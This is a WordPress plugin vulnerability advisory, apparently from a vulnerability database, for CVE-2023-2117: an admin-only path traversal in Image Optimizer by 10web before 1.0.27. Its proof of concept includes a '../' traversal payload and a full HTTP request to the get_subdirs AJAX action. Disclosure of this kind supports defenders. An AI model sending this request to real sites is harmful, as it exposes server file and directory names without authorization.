WordPress Plugin Vulnerabilities

Image Optimizer by 10web < 1.0.27 - Admin+ Path Traversal

Description

The plugin does not sanitize the dir parameter when handling the get_subdirs ajax action, allowing a high privileged users such as admins to inspect names of files and directories outside of the sites root.

Proof of Concept

- Payload: ../../../../../../../../../../../../../../../../../../../
- At the "Other directory" function, select a directory -> At param "dir" add payload: ../../../../../../../../../../ ../ ../../../../../../../../../../..

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Referer: http://localhost/wordpress/wp-admin/admin.php?page=iowd_settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 102
Cookie: [Admiin+]

action=get_subdirs&nonce_iowd=xxxxxxxxxx&dir=../../../../../../../../../../../../../../../../../../../

Affects Plugins

Plugin icon
image-optimizer-wd
Fixed in 1.0.27

References

CVE
CVE-2023-2117

Classification

Type
TRAVERSAL
OWASP top 10
A1: Injection
CWE
CWE-22
CVSS
4.1 (medium)

Miscellaneous

Original Researcher
Chien Vuong
Submitter
Chien Vuong
Verified
Yes
WPVDB ID
44024299-ba40-4da7-81e1-bd44d10846f3

Timeline

Publicly Published
2023-05-02 (about 1 years ago)
Added
2023-05-02 (about 1 years ago)
Last Updated
2023-05-02 (about 1 years ago)

Other

Published
Title
Published
2022-03-01
Title
String Locator < 2.5.0 - Admin+ Arbitrary File Read
Published
2022-05-16
Title
User Meta < 2.4.4 - Subscriber+ Local File Enumeration via Path Traversal
Published
2022-08-09
Title
WPide < 3.0 - Admin+ Arbitrary File Read
Published
2022-10-20
Title
Welcart eCommerce < 2.7.8 - Unauthenticated Arbitrary File Access
Published
2023-03-20
Title
All-In-One Security (AIOS) < 5.1.5 - Admin+ Arbitrary File/Folder Access via Traversal